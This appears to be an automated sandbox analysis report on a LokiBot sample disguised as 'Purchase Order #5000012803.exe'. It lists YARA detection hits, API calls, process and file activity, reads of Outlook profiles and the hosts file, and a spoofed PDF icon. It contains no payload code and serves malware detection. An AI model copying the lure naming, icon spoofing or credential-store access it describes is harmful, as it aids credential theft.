              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: Purchase Order #5000012803.exe
              Executable has a suspicious name (potential lure to open the executable)Show sources
              Source: Purchase Order #5000012803.exeStatic file information: Suspicious name
              Source: Purchase Order #5000012803.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403225
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0040604C0_2_0040604C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_004047720_2_00404772
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_0040549C1_2_0040549C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_004029D41_2_004029D4
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: String function: 00405B6F appears 42 times
              Source: Purchase Order #5000012803.exe, 00000000.00000003.659919332.00000000033DF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order #5000012803.exe
              Source: Purchase Order #5000012803.exe, 00000000.00000003.662407150.0000000003246000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order #5000012803.exe
              Source: Purchase Order #5000012803.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Purchase Order #5000012803.exeReversingLabs: Detection: 25%
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Users\user\Desktop\Purchase Order #5000012803.exeJump to behavior
              Source: Purchase Order #5000012803.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe" Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB0C.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@61/1
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: Binary string: wntdll.pdbUGP source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Purchase Order #5000012803.exe PID: 7000, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_72B21000 push eax; ret 0_2_72B2102E
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: iconPdf.png
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
